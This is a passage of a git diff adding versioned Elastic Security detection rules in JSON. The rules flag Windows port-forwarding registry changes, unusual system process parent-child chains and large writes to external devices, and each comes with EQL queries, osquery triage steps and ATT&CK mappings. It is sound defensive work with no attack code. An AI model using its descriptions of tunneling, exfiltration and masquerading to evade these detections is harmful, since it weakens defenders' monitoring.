prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n)\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json new file mode 100644 index 00000000000..7ac32bd06ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Port Forwarding Rule Addition", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n)\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json new file mode 100644 index 00000000000..37386dc819a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json @@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_bytes_written_to_external_device", + "name": "Spike in Bytes Sent to an External Device", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "35a3b253-eea8-46f0-abd3-68bdd47e6e3d", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json new file mode 100644 index 00000000000..e44cd8f7ee4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent-Child Relationship", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\", \"svchost.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\", \"ngentask.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\", \"conhost.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", + "references": [ + "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", + "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "35df0dd8-092d-4a83-88c1-5151a804f31b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json new file mode 100644 index 00000000000..7d9b9abc8ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent-Child Relationship", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\", \"svchost.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\", \"ngentask.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\", \"conhost.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", + "references": [ + "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", + "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "35df0dd8-092d-4a83-88c1-5151a804f31b_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json new file mode 100644 index 00000000000..eb697d3ae5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files.", + "false_positives": [ + "False-Positives (FP) should be at a minimum with this detection as PID files are meant to hold process IDs, not inherently be executables 